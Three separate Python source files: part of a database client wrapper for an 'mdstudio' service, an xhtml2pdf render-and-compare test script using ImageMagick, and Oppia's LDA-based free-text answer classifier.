# type: (CollectionType, DocumentType, DocumentType, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'update': update
}
if upsert:
request['upsert'] = upsert
if fields:
request['fields'] = fields.to_dict()
return self._call('update_one', request)
def update_many(self, collection, filter, update, upsert=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'update': update
}
if upsert:
request['upsert'] = upsert
if fields:
request['fields'] = fields.to_dict()
return self._call('update_many', request)
def find_one(self, collection, filter, projection=None, skip=None, sort=None, fields=None):
# type: (CollectionType, DocumentType, Optional[ProjectionOperators], Optional[int], SortOperators, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if projection:
request['projection'] = projection
if skip:
request['skip'] = skip
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one', request)
def find_many(self, collection, filter, projection=None, skip=None, limit=None, sort=None, fields=None):
# type: (CollectionType, DocumentType, Optional[ProjectionOperators], Optional[int], Optional[int], SortOperators, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if projection:
request['projection'] = projection
if skip:
request['skip'] = skip
if limit:
request['limit'] = limit
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_many', request)
def find_one_and_update(self, collection, filter, update, upsert=False, projection=None, sort=None,
return_updated=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[ProjectionOperators], SortOperators, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'update': update,
'upsert': upsert,
'returnUpdated': return_updated
}
if projection:
request['projection'] = projection
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one_and_update', request)
def find_one_and_replace(self, collection, filter, replacement, upsert=False, projection=None, sort=None,
return_updated=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[ProjectionOperators], SortOperators, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'replacement': replacement,
'upsert': upsert,
'returnUpdated': return_updated
}
if projection:
request['projection'] = projection
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one_and_replace', request)
def find_one_and_delete(self, collection, filter, projection=None, sort=None, fields=None):
# type: (CollectionType, DocumentType, Optional[ProjectionOperators], SortOperators, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if projection:
request['projection'] = projection
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one_and_delete', request)
def distinct(self, collection, field, query=None, fields=None):
# type: (CollectionType, str, Optional[DocumentType], Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'field': field
}
if query:
request['query'] = query
if fields:
request['fields'] = fields.to_dict()
return self._call('distinct', request)
def aggregate(self, collection, pipeline):
# type: (CollectionType, List[AggregationOperator]) -> Dict[str, Any]
request = {
'collection': collection,
'pipeline': pipeline
}
return self._call('aggregate', request)
def delete_one(self, collection, filter, fields=None):
# type: (CollectionType, DocumentType, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if fields:
request['fields'] = fields.to_dict()
return self._call('delete_one', request)
def delete_many(self, collection, filter, fields=None):
# type: (CollectionType, DocumentType, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if fields:
request['fields'] = fields.to_dict()
return self._call('delete_many', request)
def create_indexes(self, collection, indexes):
# type: (CollectionType, str, List[Index]) -> Any
indexes = []
for i in indexes:
indexes.append(i.to_dict(create=True, to_mongo=False))
return self._call('create_indexes', {
'collection': collection,
'indexes': indexes
})
def drop_indexes(self, collection, indexes):
# type: (CollectionType, str, List[Index]) -> Any
db_collection = self._get_collection(collection)
indexes = []
for i in indexes:
indexes.append(i.to_dict(create=False, name_exclusive=True, to_mongo=False))
return self._call('drop_indexes', {
'collection': collection,
'indexes': indexes
})
def drop_all_indexes(self, collection):
# type: (CollectionType, str) -> Any
db_collection = self._get_collection(collection)
if db_collection:
db_collection.drop_indexes()
@chainable
def make_cursor(self, results, fields):
res = yield results
return_value(Cursor(self, res, fields))
def _prepare_sortmode(self, sort):
if not sort:
return sort
sort = copy.deepcopy(sort)
if isinstance(sort, list):
for i, (name, mode) in enumerate(sort):
sort[i] = [name, str(mode)]
else:
sort = [[sort[0], str(sort[1])]]
return sort
def _call(self, uri, request):
return self.session.call('mdstudio.db.endpoint.{}'.format(uri), request,
claims=self.call_context.get_db_claims(self.connection_type))
|
|
#!/usr/bin/env python
from __future__ import print_function
import datetime
import os
import shutil
import sys
import glob
import decimal
from optparse import OptionParser
from subprocess import Popen, PIPE
from xhtml2pdf import pisa
do_bytes = 'b'
if sys.version[0] != '2':
do_bytes = ''
def render_pdf(filename, output_dir, options):
if options.debug:
print('Rendering %s' % filename)
basename = os.path.basename(filename)
outname = '%s.pdf' % os.path.splitext(basename)[0]
outfile = os.path.join(output_dir, outname)
input = open(filename, 'rb')
output = open(outfile, 'wb')
result = pisa.pisaDocument(input, output, path=filename)
input.close()
output.close()
if result.err:
print('Error rendering %s: %s' % (filename, result.err))
sys.exit(1)
return outfile
def convert_to_png(infile, output_dir, options):
if options.debug:
print('Converting %s to PNG' % infile)
basename = os.path.basename(infile)
filename = os.path.splitext(basename)[0]
outname = '%s.page%%0d.png' % filename
globname = '%s.page*.png' % filename
outfile = os.path.join(output_dir, outname)
exec_cmd(options, options.convert_cmd, '-density', '150', infile, outfile)
outfiles = glob.glob(os.path.join(output_dir, globname))
outfiles.sort()
if options.remove_transparencies:
for outfile in outfiles:
# convert transparencies to white background
# Done after PDF to PNG conversion, as during that conversion this will remove most background colors.
exec_cmd(options, options.convert_cmd, '-background', 'white', '-alpha', 'remove', outfile, outfile)
return outfiles
def create_diff_image(srcfile1, srcfile2, output_dir, options):
if options.debug:
print('Creating difference image for %s and %s' % (srcfile1, srcfile2))
outname = '%s.diff%s' % os.path.splitext(srcfile1)
outfile = os.path.join(output_dir, outname)
_, result = exec_cmd(options, options.compare_cmd, '-metric', 'ae', srcfile1, srcfile2, '-lowlight-color', 'white', outfile)
diff_value = int(float(result.strip()))
if diff_value > 0:
if not options.quiet:
print('Image %s differs from reference, value is %i' % (srcfile1, diff_value))
return outfile, diff_value
def copy_ref_image(srcname, output_dir, options):
if options.debug:
print('Copying reference image %s ' % srcname)
dstname = os.path.basename(srcname)
dstfile = os.path.join(output_dir, '%s.ref%s' % os.path.splitext(dstname))
shutil.copyfile(srcname, dstfile)
return dstfile
def create_thumbnail(filename, options):
thumbfile = '%s.thumb%s' % os.path.splitext(filename)
if options.debug:
print('Creating thumbnail of %s' % filename)
exec_cmd(options, options.convert_cmd, '-resize', '20%', filename, thumbfile)
return thumbfile
def render_file(filename, output_dir, ref_dir, options):
if not options.quiet:
print('Rendering %s' % filename)
pdf = render_pdf(filename, output_dir, options)
pngs = convert_to_png(pdf, output_dir, options)
if options.create_reference:
return None, None, 0
thumbs = [create_thumbnail(png, options) for png in pngs]
pages = [{'png': p, 'png_thumb': thumbs[i]}
for i,p in enumerate(pngs)]
diff_count = 0
if not options.no_compare:
for page in pages:
refsrc = os.path.join(ref_dir, os.path.basename(page['png']))
if not os.path.isfile(refsrc):
print('Reference image for %s not found!' % page['png'])
continue
page['ref'] = copy_ref_image(refsrc, output_dir, options)
page['ref_thumb'] = create_thumbnail(page['ref'], options)
page['diff'], page['diff_value'] = \
create_diff_image(page['png'], page['ref'],
output_dir, options)
page['diff_thumb'] = create_thumbnail(page['diff'], options)
if page['diff_value']:
diff_count += 1
return pdf, pages, diff_count
def exec_cmd(options, *args):
if options.debug:
print('Executing %s' % ' '.join(args))
proc = Popen(args, stdout=PIPE, stderr=PIPE)
result = proc.communicate()
if options.debug:
print(result[0], result[1])
if proc.returncode:
print('exec error (%i): %s' % (proc.returncode, result[1]))
sys.exit(1)
return result[0], result[1]
def create_html_file(results, template_file, output_dir, options):
html = []
for origin_html, pdf, pages, diff_count in results:
if options.only_errors and not diff_count:
continue
pdfname = os.path.basename(pdf)
htmlname = os.path.basename(origin_html)
html.append('<div class="result">\n'
'<h2><a href="%(pdf)s" class="pdf-file">%(pdf)s</a></h2>\n'
'<h2>Generated from <a href="../%(src)s/%(html)s" class="">%(html)s</a></h2>\n'
% {'pdf': pdfname, 'html':htmlname, 'src': options.source_dir})
for i, page in enumerate(pages):
vars = dict(((k, os.path.basename(v)) for k,v in page.items()
if k != 'diff_value'))
vars['page'] = i+1
if 'diff' in page:
vars['diff_value'] = page['diff_value']
if vars['diff_value']:
vars['class'] = 'result-page-diff error'
else:
if options.only_errors:
continue
vars['class'] = 'result-page-diff'
html.append('<div class="%(class)s">\n'
'<h3>Page %(page)i</h3>\n'
'<div class="result-img">\n'
'<div class="result-type">Difference '
'(Score %(diff_value)i)</div>\n'
'<a href="%(diff)s" class="diff-file">'
'<img src="%(diff_thumb)s"/></a>\n'
'</div>\n'
'<div class="result-img">\n'
'<div class="result-type">Rendered</div>\n'
'<a href="%(png)s" class="png-file">'
'<img src="%(png_thumb)s"/></a>\n'
'</div>\n'
'<div class="result-img">\n'
'<div class="result-type">Reference</div>\n'
'<a href="%(ref)s" class="ref-file">'
'<img src="%(ref_thumb)s"/></a>\n'
'</div>\n'
'</div>\n' % vars)
else:
html.append('<div class="result-page">\n'
'<h3>Page %(page)i</h3>\n'
'<div class="result-img">\n'
'<a href="%(png)s" class="png-file">'
'<img src="%(png_thumb)s"/></a>\n'
'</div>\n'
'</div>\n' % vars)
html.append('</div>\n\n')
now = datetime.datetime.now()
title = 'xhtml2pdf Test Rendering Results, (Python %s) %s' % (sys.version,now.strftime('%c'))
template = open(template_file, 'r'+do_bytes).read()
template = template.replace('%%TITLE%%', title)
template = template.replace('%%RESULTS%%', '\n'.join(html))
htmlfile = os.path.join(output_dir, 'index.html')
outfile = open(htmlfile, 'w'+do_bytes)
outfile.write(template)
outfile.close()
return htmlfile
def main():
options, args = parser.parse_args()
base_dir = os.path.abspath(os.path.join(__file__, os.pardir))
source_dir = os.path.join(base_dir, options.source_dir)
if options.create_reference is not None:
output_dir = os.path.join(base_dir, options.create_reference)
else:
output_dir = os.path.join(base_dir, options.output_dir)
template_file = os.path.join(base_dir, options.html_template)
ref_dir = os.path.join(base_dir, options.ref_dir)
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
os.makedirs(output_dir)
results = []
diff_count = 0
if len(args) == 0:
files = glob.glob(os.path.join(source_dir, '*.html'))
else:
files = [os.path.join(source_dir, arg) for arg in args]
for filename in files:
pdf, pages, diff = render_file(filename, output_dir, ref_dir, options)
diff_count += diff
results.append((filename, pdf, pages, diff))
num = len(results)
if options.create_reference is not None:
print('Created reference for %i file%s' % (num, '' if num == 1 else 's'))
else:
htmlfile = create_html_file(results, template_file, output_dir, options)
if not options.quiet:
print('Rendered %i file%s' % (num, '' if num == 1 else 's'))
print('%i file%s differ%s from reference' % \
(diff_count, diff_count != 1 and 's' or '',
diff_count == 1 and 's' or ''))
print('Check %s for results' % htmlfile)
if diff_count:
if options.nofail:
print("Differences were found but the error code is suppressed.")
sys.exit(0)
else:
sys.exit(1)
parser = OptionParser(
usage='rendertest.py [options] [source_file] [source_file] ...',
description='Renders a single html source file or all files in the data '
'directory, converts them to PNG format and prepares a result '
'HTML file for comparing the output with an expected result')
parser.add_option('-s', '--source-dir', dest='source_dir', default='data/source',
help=('Path to directory containing the html source files'))
parser.add_option('-o', '--output-dir', dest='output_dir', default='output',
help='Path to directory for output files. CAREFUL: this '
'directory will be deleted and recreated before rendering!')
parser.add_option('-r', '--ref-dir', dest='ref_dir', default='data/reference',
help='Path to directory containing the reference images '
'to compare the result with')
parser.add_option('-t', '--template', dest='html_template',
default='data/template.html', help='Name of HTML template file')
parser.add_option('-e', '--only-errors', dest='only_errors', action='store_true',
default=False, help='Only include images in HTML file which '
'differ from reference')
parser.add_option('-q', '--quiet', dest='quiet', action='store_true',
default=False, help='Try to be quiet')
parser.add_option('-F', '--nofail', dest='nofail', action='store_true',
default=False, help="Doesn't return an error on failure "
"this useful when calling it in scripts"
)
parser.add_option('-X', '--remove_transparencies', dest='remove_transparencies', action='store_false',
default=True, help="Don't try to remove transparent backgrounds "
"Needed for Travis-CI"
)
parser.add_option('--no-compare', dest='no_compare', action='store_true',
default=False, help='Do not compare with reference image, '
'only render to png')
parser.add_option('-c', '--create-reference', dest='create_reference',
metavar='DIR',
default=None, help='Do not output anything, render source to '
'specified directory for reference. CAREFUL: this directory '
'will be deleted and recreated before rendering!')
parser.add_option('--debug', dest='debug', action='store_true',
default=False, help='More output for debugging')
parser.add_option('--convert-cmd', dest='convert_cmd', default='/usr/bin/convert',
help='Path to ImageMagick "convert" tool')
parser.add_option('--compare-cmd', dest='compare_cmd', default='/usr/bin/compare',
help='Path to ImageMagick "compare" tool')
if __name__ == '__main__':
main()
|
|
# coding: utf-8
#
# Copyright 2016 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classifier for free-form text answers."""
import copy
import numpy
import utils
from core.domain.base_classifier import BaseClassifier
import feconf
class LDAStringClassifier(BaseClassifier):
"""A classifier that uses supervised learning to match free-form text
answers to answer groups. The classifier trains on answers that exploration
editors have assigned to an answer group. Given a new answer, it predicts
the answer group using Latent Dirichlet Allocation
(https://en.wikipedia.org/wiki/Latent_Dirichlet_allocation) with Gibbs
Sampling.
Below is an example workflow for running a batch job that builds a new
classifier and outputs it to a dictionary.
# Examples are formatted as a list. Each element is a doc followed by a
# list of labels.
train_data = [
['i eat fish and vegetables', ['food']],
['fish are pets', ['pets']],
['my kitten eats fish', ['food', 'pets']]
]
classifier = LDAStringClassifier()
classifier.train(train_data)
classifier_dict = classifier.to_dict()
save_to_data_store(classifier_dict)
Below is an example workflow for using an existing classifier to predict a
document's label.
# A list of docs to classify.
prediction_data = [
'i only eat fish and vegetables'
]
classifier_dict = load_from_data_store()
classifier = LDAStringClassifier()
classifier.from_dict(classifier_dict)
labels = classifier.predict(prediction_data)
print labels
Below are some concepts used in this class.
doc - A student free form response, represented as a string of arbitrary
non-whitespace characters (a "word") separated by single spaces.
word - A string of arbitrary non-whitespace characters.
word id - A unique word. Each unique word has one word id that is used
to represent the word in the classifier model.
word instance - An instance of a word id. Each word id can have multiple
instances corresponding to its occurrences in all docs.
label - An answer group that the doc should correspond to. If a doc is
being added to train a model, labels are provided. If a doc is being
added for prediction purposes, no labels are provided. If a doc does
not match any label, the doc should have only one label, '_default'.
label bit vector - A bit vector corresponding to a doc, indexed by label
id. A one in the vector means the label id matches some word instance
in the doc; a zero in the vector means the label id does not match any
word instance in the doc.
example - A doc with a list of labels it should be matched to.
It is possible for a word instance in a doc to not have an explicit label
assigned to it. This is characterized by assigning DEFAULT_LABEL to the
word instance.
"""
# Internal learning rates. These are initialized to Wikipedia's
# recommendations. Do not change these unless you know what you're doing.
_DEFAULT_ALPHA = 0.1
_DEFAULT_BETA = 0.001
_DEFAULT_TRAINING_ITERATIONS = 25
_DEFAULT_PREDICTION_ITERATIONS = 5
_DEFAULT_PREDICTION_THRESHOLD = 0.5
# Classifiers built with less than _DEFAULT_MIN_DOCS_TO_PREDICT will
# likely not be useful for predicting as there are not enough examples to
# build a generalized model. The value 20 was chosen as a balance between a
# reasonable number of data to learn from and a low entry barrier to using
# the classifier.
_DEFAULT_MIN_DOCS_TO_PREDICT = 20
# Because prediction uses Prob(the doc should be assigned this label | the
# doc is not assigned DEFAULT_LABEL), if there are only two labels (the
# default label and one other) then the one other label will always be
# predicted. Therefore, a minimum of 3 labels are needed to perform a valid
# prediction.
_DEFAULT_MIN_LABELS_TO_PREDICT = 3
def __init__(self):
"""Initializes constants for the classifier.
This class uses index notation with the format "_V_XY", where V is the
element of an array, and X and Y are the indices used to measure V.
https://en.wikipedia.org/wiki/Index_notation
The following maps index notation letters to their meanings:
b - boolean value for whether Y is set in X
c - count of Y's in X
p - position of a value V in X
l - label id
w - word id
d - doc id
"""
super(LDAStringClassifier, self).__init__()
# Setting a seed ensures that results are deterministic.
# There is nothing special about the value 4.
numpy.random.seed(seed=4)
# Internal learning rates.
self._alpha = self._DEFAULT_ALPHA
self._beta = self._DEFAULT_BETA
# Internal model representation. These private attributes should be
# initialized in load_examples() or from_dict().
# Lists of booleans, where each boolean represents whether a
# label is contained within a doc.
self._b_dl = None
# Lists of counts, where each list represents the number of
# word instances assigned to each label in a doc.
self._c_dl = None
# A list of counts, where each count is the number of times a label
# was assigned (aggregated over all word instances in all docs).
self._c_l = None
# Lists of counts, where each list represents the number of
# word instances assigned to each label for a given word id (aggregated
# across all docs).
self._c_lw = None
# Lists of label ids, where each list represents what label
# is assigned to a word instance.
self._l_dp = None
# Lists of word ids, where each list represents a doc.
self._w_dp = None
# A dict which maps labels to their ids.
self._label_to_id = None
# A dict which maps words to their ids.
self._word_to_id = None
# An int which holds the number of docs in the classifier.
self._num_docs = None
# An int which holds the number of labels in the classifier.
self._num_labels = None
# An int which holds the number of words in the classifier.
self._num_words = None
# An int which represents the number of training iterations
# used when adding new training examples.
self._training_iterations = self._DEFAULT_TRAINING_ITERATIONS
# An int which represents the number of prediction iterations
# used when adding new docs for prediction.
self._prediction_iterations = self._DEFAULT_PREDICTION_ITERATIONS
# A float which indicates the level of confidence required
# in order to make a prediction.
self._prediction_threshold = self._DEFAULT_PREDICTION_THRESHOLD
def _get_word_id(self, word):
"""Returns a word's id if it exists, otherwise assigns
a new id to the word and returns it.
"""
if word not in self._word_to_id:
self._word_to_id[word] = self._num_words
self._num_words += 1
return self._word_to_id[word]
def _get_label_id(self, label):
"""Returns a label's id if it exists, otherwise assigns
a new id to the label and returns it.
"""
if label not in self._label_to_id:
self._label_to_id[label] = self._num_labels
self._num_labels += 1
return self._label_to_id[label]
def _get_label_name(self, l):
"""Returns a label's string name given its internal id.
If the id does not have a corresponding name, an exception is
raised.
"""
for label_name, label_id in self._label_to_id.iteritems():
if label_id == l:
return label_name
raise Exception('Label id %d does not exist.' % l)
def _get_doc_with_label_vector(self, d):
"""Given a doc id, return the doc and its label bit vector."""
return self._w_dp[d], self._b_dl[d]
def _get_label_vector(self, labels):
"""Generate and return a label bit vector given a list of labels that
are turned on for the vector.
"""
label_vector = numpy.zeros(self._num_labels)
for label in labels:
label_vector[self._get_label_id(label)] = 1
label_vector[self._label_to_id[feconf.DEFAULT_CLASSIFIER_LABEL]] = 1
return label_vector
def _update_counting_matrices(self, d, w, l, val):
"""Updates counting matrices (ones that begin with _c) when a label
is assigned and unassigned to a word.
"""
self._c_dl[d, l] += val
self._c_lw[l, w] += val
self._c_l[l] += val
def _increment_counting_matrices(self, d, w, l):
"""Updates counting matrices when a label is assigned to a word
instance in a doc.
"""
self._update_counting_matrices(d, w, l, 1)
def _decrement_counting_matrices(self, d, w, l):
"""Updates counting matrices when a label is unassigned from a word
instance in a doc.
"""
self._update_counting_matrices(d, w, l, -1)
def _run_gibbs_sampling(self, doc_ids):
"""Runs one iteration of Gibbs sampling on the provided docs.
The statez variable is used for debugging, and possibly convergence
testing in the future.
"""
if doc_ids is None:
doc_ids = xrange(self._num_docs)
statez = {
'updates': 0,
'computes': 0
}
for d in doc_ids:
doc, labels = self._get_doc_with_label_vector(d)
for p, w in enumerate(doc):
l = self._l_dp[d][p]
self._decrement_counting_matrices(d, w, l)
coeff_a = 1.0 / (
self._c_dl[d].sum() + self._num_labels * self._alpha)
coeff_b = 1.0 / (
self._c_lw.sum(axis=1) + self._num_words * self._beta)
label_probabilities = (
labels *
coeff_a * (self._c_dl[d] + self._alpha) *
coeff_b * (self._c_lw[:, w] + self._beta))
new_label = numpy.random.multinomial(
1,
label_probabilities / label_probabilities.sum()).argmax()
statez['computes'] += 1
if l != new_label:
statez['updates'] += 1
self._l_dp[d][p] = new_label
self._increment_counting_matrices(d, w, new_label)
return statez
def _get_label_probabilities(self, d):
"""Returns a list of label probabilities for a given doc, indexed by
label id.
"""
unnormalized_label_probs = (
self._c_dl[d] + (self._b_dl[d] * self._alpha))
label_probabilities = (
unnormalized_label_probs / unnormalized_label_probs.sum())
return label_probabilities
def _get_prediction_report_for_doc(self, d):
"""Generates and returns a prediction report for a given doc.
The prediction report is a dict with the following keys:
- 'prediction_label_id': the document's predicted label id
- 'prediction_label_name': prediction_label_id's label name
- 'prediction_confidence': the prediction confidence. This is
Prob(the doc should be assigned this label |
the doc is not assigned DEFAULT_LABEL).
- 'all_predictions': a dict mapping each label to
Prob(the doc should be assigned to this label).
Because DEFAULT_LABEL is a special label that captures unspecial
tokens (how ironic), its probability is not a good predicting
indicator. For the current normalization process, it has on
average a higher probability than other labels. To combat this,
all other labels are normalized as if the default label did not
exist. For example, if we have two labels with probability 0.2
and 0.3 with the default label having probability 0.5, the
normalized probability for the two labels without the default
label is 0.4 and 0.6, respectively.
The prediction threshold is currently defined at the classifier level.
A higher prediction threshold indicates that the predictor needs
more confidence prior to making a prediction, otherwise it will
predict DEFAULT_LABEL. This will make non-default predictions more
accurate, but result in fewer of them.
"""
default_label_id = self._get_label_id(feconf.DEFAULT_CLASSIFIER_LABEL)
prediction_label_id = default_label_id
prediction_confidence = 0
label_probabilities = self._get_label_probabilities(d)
normalization_coeff = (
1.0 / (1.0 - label_probabilities[default_label_id]))
for l, prob in enumerate(label_probabilities):
if (l != default_label_id and
prob * normalization_coeff > self._prediction_threshold and
prob * normalization_coeff > prediction_confidence):
prediction_label_id = l
prediction_confidence = prob * normalization_coeff
return {
'prediction_label_id': prediction_label_id,
'prediction_label_name':
self._get_label_name(prediction_label_id),
'prediction_confidence': prediction_confidence,
'all_predictions': label_probabilities
}
def _parse_examples(self, examples):
"""Unzips docs and label lists from examples and returns the two lists.
Docs are split on whitespace. Order is preserved.
"""
docs = []
labels_list = []
for example in examples:
doc_string = example[0]
doc = doc_string.split()
if len(doc) > 0:
labels = example[1]
docs.append(doc)
labels_list.append(labels)
return docs, labels_list
def _iterate_gibbs_sampling(self, iterations, doc_ids):
"""Runs Gibbs sampling for "iterations" number of times on the provided
docs.
"""
for _ in xrange(iterations):
self._run_gibbs_sampling(doc_ids)
def _add_examples(self, examples, iterations):
"""Adds examples to the internal state of the classifier, assigns
random initial labels to only the added docs, and runs Gibbs sampling
for iterations number of iterations.
"""
if len(examples) == 0:
return
docs, labels_list = self._parse_examples(examples)
last_num_labels = self._num_labels
last_num_docs = self._num_docs
last_num_words = self._num_words
# Increments _num_labels with any new labels
for labels in labels_list:
for label in labels:
self._get_label_id(label)
self._num_docs += len(docs)
self._b_dl = numpy.concatenate(
(self._b_dl, numpy.zeros(
(last_num_docs, self._num_labels - last_num_labels),
dtype=int)), axis=1)
self._b_dl = numpy.concatenate(
(self._b_dl, [
self._get_label_vector(labels) for labels in labels_list
]), axis=0)
self._w_dp.extend([map(self._get_word_id, doc) for doc in docs])
self._c_dl = numpy.concatenate(
(self._c_dl, numpy.zeros(
(last_num_docs, self._num_labels - last_num_labels),
dtype=int)), axis=1)
self._c_dl = numpy.concatenate(
(self._c_dl, numpy.zeros(
(self._num_docs - last_num_docs, self._num_labels),
dtype=int)), axis=0)
self._c_lw = numpy.concatenate(
(self._c_lw, numpy.zeros(
(last_num_labels, self._num_words - last_num_words),
dtype=int)), axis=1)
self._c_lw = numpy.concatenate(
(self._c_lw, numpy.zeros(
(self._num_labels - last_num_labels, self._num_words),
dtype=int)), axis=0)
self._c_l = numpy.concatenate(
(self._c_l, numpy.zeros(
self._num_labels - last_num_labels, dtype=int)))
for d in xrange(last_num_docs, self._num_docs):
doc, _ = self._get_doc_with_label_vector(d)
l_p = numpy.random.random_integers(
0, self._num_labels - 1, size=len(doc)).tolist()
self._l_dp.append(l_p)
for w, l in zip(doc, l_p):
self._increment_counting_matrices(d, w, l)
self._iterate_gibbs_sampling(iterations, [d])
return xrange(last_num_docs, self._num_docs)
def add_examples_for_training(self, training_examples):
"""Adds examples to the classifier with _training_iterations number of
iterations.
Args:
training_examples: list of 'examples'. Each example is represented
by a 2-element list. The first item of the list is a str
representing a doc, and the second item is a list of labels
that the doc should be matched to. E.g.:
training_examples = [
['i eat fish and vegetables', ['food']],
['fish are pets', ['pets']],
['my kitten eats fish', ['food', 'pets']]
]
Returns:
xrange. An iterator over the ids of the docs just added.
"""
return self._add_examples(training_examples, self._training_iterations)
def _add_docs_for_predicting(self, prediction_docs):
"""Adds examples to the classifier with _prediction_iterations number
of iterations.
Args:
prediction_examples: list of str. A list of docs.
prediction_examples = [
'i only eat fish and vegetables'
]
Returns:
xrange. An iterator over the ids of the docs just added.
"""
all_labels = self._label_to_id.keys()
return self._add_examples(
zip(prediction_docs, [
copy.deepcopy(all_labels) for _ in prediction_docs]),
self._prediction_iterations)
def _predict_label_for_doc(self, sample):
"""Returns the predicted label from a sample's prediction report.
Args:
sample: int. A doc id (see example in class docstring).
Returns:
str. The label predicted by the classifier for the given sample.
"""
if (self._num_docs < self._DEFAULT_MIN_DOCS_TO_PREDICT or
self._num_labels < self._DEFAULT_MIN_LABELS_TO_PREDICT):
return feconf.DEFAULT_CLASSIFIER_LABEL
return self._get_prediction_report_for_doc(
sample)['prediction_label_name']
def to_dict(self):
"""Returns a dict representing this StringClassifier.
Returns:
dict. A representation of the state of the classifier.
"""
model = {}
model['_alpha'] = copy.deepcopy(self._alpha)
model['_beta'] = copy.deepcopy(self._beta)
model['_prediction_threshold'] = copy.deepcopy(
self._prediction_threshold)
model['_training_iterations'] = copy.deepcopy(
self._training_iterations)
model['_prediction_iterations'] = copy.deepcopy(
self._prediction_iterations)
model['_num_labels'] = copy.deepcopy(self._num_labels)
model['_num_docs'] = copy.deepcopy(self._num_docs)
model['_num_words'] = copy.deepcopy(self._num_words)
model['_label_to_id'] = copy.deepcopy(self._label_to_id)
model['_word_to_id'] = copy.deepcopy(self._word_to_id)
model['_w_dp'] = copy.deepcopy(self._w_dp)
model['_b_dl'] = copy.deepcopy(self._b_dl)
model['_l_dp'] = copy.deepcopy(self._l_dp)
model['_c_dl'] = copy.deepcopy(self._c_dl)
model['_c_lw'] = copy.deepcopy(self._c_lw)
model['_c_l'] = copy.deepcopy(self._c_l)
return model
def from_dict(self, model):
"""Initializes the properties of this classifier from a dict
constructed using to_dict().
Args:
model: A dict representing a StringClassifier.
"""
self._alpha = copy.deepcopy(model['_alpha'])
self._beta = copy.deepcopy(model['_beta'])
self._prediction_threshold = copy.deepcopy(
model['_prediction_threshold'])
self._training_iterations = copy.deepcopy(
model['_training_iterations'])
self._prediction_iterations = copy.deepcopy(
model['_prediction_iterations'])
self._num_labels = copy.deepcopy(model['_num_labels'])
self._num_docs = copy.deepcopy(model['_num_docs'])
self._num_words = copy.deepcopy(model['_num_words'])
self._label_to_id = copy.deepcopy(model['_label_to_id'])
self._word_to_id = copy.deepcopy(model['_word_to_id'])
self._w_dp = copy.deepcopy(model['_w_dp'])
self._b_dl = copy.deepcopy(model['_b_dl'])
self._l_dp = copy.deepcopy(model['_l_dp'])
self._c_dl = copy.deepcopy(model['_c_dl'])
self._c_lw = copy.deepcopy(model['_c_lw'])
self._c_l = copy.deepcopy(model['_c_l'])
def train(self, training_data):
"""Sets the internal state of the classifier, assigns random initial
labels to the docs, and runs Gibbs sampling for _training_iterations
number of iterations.
Args:
training_data: list of free form texts. Each item is represented
by a 2-element list. The first item of the list is a str
representing a sample, and the second item is a list of labels
that the sample should be matched to. E.g.: [
['i eat fish and vegetables', ['food']],
['fish are pets', ['pets']],
['my kitten eats fish', ['food', 'pets']]
"""
docs, labels_list = self._parse_examples(training_data)
label_set = set(
[feconf.DEFAULT_CLASSIFIER_LABEL] +
[label for labels in labels_list for label in labels])
self._num_labels = len(label_set)
self._label_to_id = dict(zip(label_set, xrange(self._num_labels)))
self._num_words = 0
self._word_to_id = {}
self._num_docs = len(docs)
self._b_dl = numpy.array(
map(self._get_label_vector, labels_list), dtype=int)
self._w_dp = [map(self._get_word_id, doc) for doc in docs]
self._c_dl = numpy.zeros(
(self._num_docs, self._num_labels), dtype=int)
self._c_lw = numpy.zeros(
(self._num_labels, self._num_words), dtype=int)
self._c_l = numpy.zeros(self._num_labels, dtype=int)
self._l_dp = []
for d in xrange(self._num_docs):
doc, _ = self._get_doc_with_label_vector(d)
l_p = numpy.random.random_integers(
0, self._num_labels - 1, size=len(doc)).tolist()
self._l_dp.append(l_p)
for w, l in zip(doc, l_p):
self._increment_counting_matrices(d, w, l)
self._iterate_gibbs_sampling(
self._training_iterations,
xrange(self._num_docs))
def predict(self, predicting_data):
"""Predicts what labels should be set to each sample in
'predicting_data'
Args:
predicting_data: list(str). Each item represents a free form
text input by user.
Returns:
list(prediction report). Each item is a prediction report
for the corresponding sample.
"""
doc_ids = self._add_docs_for_predicting(predicting_data)
return [self._predict_label_for_doc(doc_id) for doc_id in doc_ids]
def validate(self, classifier_data):
"""Validates cached classifier data.
Args:
classifier_data: dict. Consists of various parameter of the
classifier.
"""
float_properties = [
'_alpha',
'_beta',
'_prediction_threshold'
]
int_properties = [
'_training_iterations',
'_prediction_iterations',
'_num_labels',
'_num_docs',
'_num_words'
]
dict_properties = [
'_label_to_id',
'_word_to_id'
]
